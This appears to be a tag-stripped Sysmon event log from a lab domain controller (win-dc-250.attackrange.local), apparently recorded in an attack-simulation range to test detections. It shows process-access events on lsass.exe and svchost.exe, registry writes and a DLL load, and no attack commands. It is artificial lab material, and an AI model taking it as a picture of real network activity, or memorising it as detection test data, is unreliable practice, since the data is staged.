13:10:15.977{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.977{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.961{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.961{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.961{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.852{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.852{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.852{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.852{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.852{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.852{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002770Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.773{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.742{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000002759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.727{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000591) 13241300x80000000000000002758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchDomainATTACKRANGE 13241300x80000000000000002757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastSuccessfulADS&SFetchBinary Data 13241300x80000000000000002756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\Parameters\ADHarvest\LastFetchContents* 734700x80000000000000002755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.539{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 13241300x80000000000000002754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{1cb43b2c-c86a-4e06-b290-4cc7148155ac}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000002753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:15.539{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{1cb43b2c-c86a-4e06-b290-4cc7148155ac}\LastProbeTimeDWORD (0x600042b7) 13241300x80000000000000002752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 